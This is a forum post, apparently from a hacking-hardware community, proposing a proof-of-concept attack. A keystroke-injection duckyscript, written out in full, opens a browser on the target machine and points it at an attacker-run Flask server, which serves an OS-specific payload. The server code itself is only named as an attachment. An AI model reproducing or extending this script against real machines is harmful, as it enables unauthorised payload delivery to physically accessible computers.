sub0 Posted January 3, 2019 Share Posted January 3, 2019 Hello, I had an idea for a sort of cross platform attack. It is based around OS detection via the user agent in a browser. The attached file is a simple python webserver using flask to detect the user agent and serve the payload according to the targets user agent. This is only a PoC, nothing finalized at all but I think an interesting idea to play with. This could probably be deployed with the bash bunny as well. The idea is to run this duckyscript: DELAY 1000 ALT F2 DELAY 50 GUI SPACE GUI r DELAY 50 BACKSPACE DELAY 100 STRING http://10.10.0.53:8080/ ENTER This opens up a browser in any major OS, which will in turn download the appropriate payload to be run manually. I'm not good with windows at all, been years since I used it (I'm a total linux nerd) so my powershell payload is probably terrible. I would welcome any and all improvements, ideas, etc. Thanks for reading! - sub0 autopwn.py Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.